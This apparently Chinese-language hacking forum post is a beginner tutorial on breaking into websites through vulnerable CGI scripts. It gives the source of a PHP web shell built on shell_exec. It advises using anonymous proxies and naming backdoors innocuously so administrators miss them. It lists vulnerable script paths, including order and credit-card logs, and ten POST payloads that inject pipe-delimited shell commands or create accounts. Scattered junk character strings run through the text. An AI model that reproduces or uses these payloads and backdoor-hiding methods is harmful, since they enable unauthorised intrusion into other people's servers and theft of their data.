CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
大家好 我是bboyhip  只是一名菜菜的exploiter
很开心来到贵论坛
这里让我感觉 很有技术交流的感觉
0 _6 @! ], I5 U! O% v  l9 n# O我会长长来玩的
前言:
以下讲解针对欧美日本网站
當我們在做滲透分析的時候 方法有很多
2 C. _9 r8 T! I  Q. @我门都知道 国外伺服器大多是linux 平台
2 o/ r! Y  L5 q, l) S% e所以有很多网站程序有6成都会使用cgi 脚本来管理
# m: ?( Y  n' l目录为/cgi-bin/

只是个人在实务上一些经验
写的不好 请多多见谅喔
2 b2 `7 z/ f6 L) w+ c在这里我简单分为几个部份一定要會的
/ i; b4 v" s# ?! O" B讲解一下
让没有基础的人很容易上手
# F6 O' K5 z! M7 u! f7 b9 q, \4 \
1 P* g! c0 O; v! A& }6 R5 l以下内容跟帖回复才能看到
==============================

/ F* ^6 V. y. s( T6 F第1部份: 何谓Shell?
Shell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
A shell is the program which reads user input from the command line and executes actions based upon that input.
0 H3 G8 I: r- x* _* j+ H1 B意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.
* j  M, Y% e$ ~: |$ O
1 O2 K! C% `5 C1 h- n5 \$ M$ V6 [9 I! r对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.
/ h7 D4 b" |1 _0 c' v
第2部份: Unix 指令
以下是一些常见及重要的指令:
' U( E8 [4 ^4 Z5 a9 ipwd: 显示当前目录, 即是後门/程式所在的位置
如 /home/www/site.com/cgi-bin/
ls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
- g5 |  k6 a0 c3 Z  }$ W% t+ Kls -al :详细列出档案资料(当前目录)
ls /: 列出根目录
% ~6 e2 G* Q0 fls /etc: 列出/etc的资料夹及档案
ls ../ -al: 详细列出上一层的资料夹及档案
* r; Y  C  j. Jcat: 显示档案内容
cat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
cat /etc/passwd: 显示 /etc/passwd 这个档案的内容
who: 显示谁login 至系统
man: 显示指令用法  
man ls: 显示ls这指令的用法  
' M6 B/ a' A6 W# I- e1 o: }mkdir 建立目录
8 y3 E; E+ ^9 B' B. l. \, X6 ]rmdir 删除目录
mv 移动档案
rm 删除档案

* c# p" z- m& {' `第3部份: Shell的使用
$ v" N( u1 c/ l; O: u4 R8 g例如:
5 e, H( P+ [) @% O' X: h$ ghttp://site.com/refer.php
这是我的後门, 原代码如下:
<Form Action="#" Method="POST">
<Input type="text" name="cmd">
2 ]7 I6 |% a, z0 ?7 I5 f0 d<Input type="Submit">
</Form>
' e3 x8 Y, w* [% u. t<?php
$cmd = $_POST['cmd'];
$Output = shell_exec($cmd);
, X* |& A3 K9 R+ |" Pecho $Output;
?>
输入pwd, 可得到绝对路径:
- Q* U9 x3 {$ Q. n5 \# M/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com
7 `+ D4 }# g/ s& a% H
5 m( A7 z1 I3 V5 {/ e! q8 D0 J# S3 R第4部份: 注意事项
- 使用匿名代理, 保障自己
- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
1 o$ G8 A$ k6 K6 H7 Z) I- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
6 c- \' L1 [- S  _$ G不容易被发现.
) K3 K! o0 o# A! A& V+ G, M0 Q3 E- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
针对网站的渗透分析方法太多了
& |- m0 R. j0 y2 {5 _这篇文章的重点是cgi 脚本攻击
- T' _5 y2 N+ |7 d) i" _所以我用简单的叙述形容
开始讲解脚本入侵过程:
# ?# e6 N6 {7 A/ C  h. M在这里提供一些方法思路让大家学习一下

1.一开始对一个网站进行cgi漏洞扫描
我们需要的东西有
扫洞工具 如:triton..等等
) u) r' C  v+ x" E1 Y. @) t% ?E表
如
& {$ T# X/ f: x4 z3 a1 o; d/cgi-bin/add-passwd.cgi
/WebShop/templates/cc.txt
/Admin_files/order.log
/orders/mountain.cfg
8 O4 C0 t9 g( Q# H/ J5 t+ Y/cgi-sys/cart.pl
% O  b3 |- u4 T0 Z, m7 _/scripts/cart.pl
/htbin/cart.pl
E表来源可以是网路收寻或是自己的0 day
, {$ c6 O6 z6 k: J2 U
* H* V  v* L9 G" t# R2.怎样确认扫到的洞 是真的还假的?
举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
: i) x. X" x! F6 T) x. |一般都是在IE里先看一下的,记住这个返回码哦
ERROR:This script should be referenced with a METHOD of POST.
没有返回一定是假的
: x# o4 t$ H! d& r5 e+ V3.重来来了 很多人都会问我
他扫到很多洞 但是不会使用
( A- b; q9 V2 d7 ]0 i9 T- s因为这些漏洞 使用的语法 称为post
我们要找post 的方法很多
9 b6 i: ]6 N" }  j  s可以是源代码分析 找出介质
或是用抓包工具 抓他的语法...等等
- K/ v$ W! _8 m! I& q
以下我提供10个 cgi 洞以及使用方法post
让大家可以针对网站去做扫描  
/index.cgi
wei=ren&gen=command
/passmaster.cgi
Action=Add&Username=Username&Password=Password
$ I. M6 Z+ ~6 P+ {1 a8 L* {9 o2 L/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
/form.cgi
5 E, p. d& K2 B3 R, u- ?* d, `* Bname=xxxx&email=email&subject=xxxx&response=|echo;ls|
/addusr.pl
3 Z, `& T3 M  v6 O! A/cgi-bin/EuroDebit/addusr.pl
3 e. \, {! B; s% S& [8 N  r+ Juser=username&pass=Password&confirm=Password
/ccbill-local.asp
( j4 \/ v, l* f' A% s( u4 `/ s& kpost_values=username:password
/count.cgi
8 v' V+ \: e6 \, I4 H: r1 }) Upinfile=|echo;ls -la;exit|
/recon.cgi
/ E) r2 Q# N: @" R5 U) z: {6 E$ m/recon.cgi?search
: K& _7 l8 a$ m. A& f' T8 Wsearchoption=1&searchfor=|echo;ls -al;exit|
0 x% I+ t3 n8 F# P( [/verotelrum.pl
( x$ b, u" G4 z. b1 _vercode=username:password:dseegsow:add:amount<&30>
$ d4 z/ m1 V* ~# l+ Y/af.cgi_browser_out=|echo;ls -la;exit;|
; i0 d7 t- h2 C4 H9 _  _
今天就讲到这  感谢大家支持
. @; |9 U3 J) @) J3 O7 j3 Y6 s